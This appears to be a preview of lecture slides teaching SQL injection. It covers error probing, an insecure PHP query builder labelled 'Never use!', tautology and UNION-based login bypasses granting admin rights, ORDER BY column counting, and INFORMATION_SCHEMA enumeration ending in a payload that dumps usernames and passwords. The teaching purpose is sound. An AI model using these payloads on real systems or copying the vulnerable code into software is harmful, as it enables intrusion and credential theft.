
























Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
SQL injection is prevalent ... SQL - UNION. UNION merges two tables together ... 5' UNION SELECT username,password,password FROM UserAccounts --. SQL ...
Typology: Schemes and Mind Maps
1 / 32
This page cannot be seen from the preview
Don't miss anything!

























DATABASE
ID username password is_admin
1 bob p4ssw0rd true
2 alice s3cur3 false
Query Data
TABLE: users
ID username password is_admin
1 bob p4ssw0rd true
2 alice s3cur3 false
USER
POST username= alice &password= s3cur
SERVER
SELECT password, is_admin FROM users WHERE username = ‘?’ ;
SELECT password, is_admin FROM users WHERE username = ‘alice’ ;
TABLE: users
ID username password is_admin
1 bob p4ssw0rd true
2 alice s3cur3 false
USER SERVER
password = s3cur is_admin = false
Password supplied: s3cur
Password in DB: s3cur
Login successful No admin privileges
✓ Uppercase letter ✓ Lowercase letter ✓ Number ✓ Special character ✓ 16 characters
Probing for errors
Probe forms with characters until syntax is broken Typically single or double-quotes
e.g. sending in parameter of ' Breaks out of username parameter (odd number of quotes) Mysql2::Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND password=''' at line 1: SELECT * FROM users WHERE username=''' AND password=''
Can infer query was SELECT * FROM users WHERE username=''' AND password='[PASSWORD]' Or SELECT * FROM users WHERE username='[USERNAME]' AND password='[PASSWORD]';
Must hide errors from adversary!
Code example (PHP) // Insecure code. Never use! $sqlStatement = "SELECT * FROM users WHERE username='". $_GET['username']. "' AND password='" .$_GET['password']. "';"; mysql_query($sqlStatement);
SELECT * FROM users WHERE username='foo' AND password='bar';
SELECT * FROM users WHERE username=‘`foo' or '1'='1' AND password='bar' or '1'='1';
UNION merges two tables together
Tables must have the same number of columns to merge
SELECT * from users …
TABLE: users
ID username password is_admin
1 bob p4ssw0rd true
2 alice s3cur3 false
ID username password
1 bob p4ssw0rd
2 alice s3cur
1 1 1
ID username password is_admin
1 bob p4ssw0rd true
2 alice s3cur3 false
ID username password is_admin
1 bob p4ssw0rd true
2 alice s3cur3 false
1 1 1 null
TABLE: users
ID username password is_admin
1 bob p4ssw0rd 1
2 alice s3cur3 0
ID username password is_admin
1 bob p4ssw0rd 1
2 alice s3cur3 0
1 1 1 1
ID username password is_admin
1 bob p4ssw0rd 1
2 alice s3cur3 0
1 1 1 1
ID username password is_admin
1 bob p4ssw0rd 1
2 alice s3cur3 0
1 1 1 1
POST username= 1’ UNION SELECT 1,1,1,1 # &password= 1
SELECT password, is_admin FROM users WHERE username = ‘1’ UNION SELECT 1,1,1,1 # ’ ;
SELECT password, is_admin FROM users WHERE username = ‘1’ UNION SELECT 1,1,1,1 # ’ ;
SELECT password, is_admin FROM users WHERE username = ‘1’ UNION SELECT 1,1,1,1 # ’ ;
SELECT password, is_admin FROM users WHERE username = ‘1’ UNION SELECT 1,1,1,1 # ’ ;
password = 1 is_admin = 1
Password supplied: 1
Password in DB: 1
Login successful Admin privileges
SERVER
SELECT password, is_admin FROM users WHERE username = '1' UNION SELECT 1,1,1,1 # ' ;
ORDER BY Sorts rows based on column number
TABLE: users
ID username password is_admin
1 bob p4ssw0rd true
2 alice s3cur3 false
Can use to determine number of columns
‘ORDER BY x’ works only if x is less than or equal to the number of objects to order
INFORMATION_SCHEMA Special MySQL table containing data about every table and column in database INFORMATION_SCHEMA.tables holds names of tables in “table_name” INFORMATION_SCHEMA.columns is a table containing data about table columns in “column_name” Helpful in injection attacks Example: Suppose this URL is injectable: www.injectable.com/article.php?articleID= Assume query uses 5 as input and returns 3 columns.
Find name of table you want 5’ UNION SELECT table_name,table_name,table_name FROM INFORMATION_SCHEMA.TABLES --
If table name of interest is “UserAccounts”, then get its columns 5 ‘ UNION SELECT column_name, column_name, column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=‘UserAccounts’ --
If column_names include username and password 5’ UNION SELECT username,password,password FROM UserAccounts --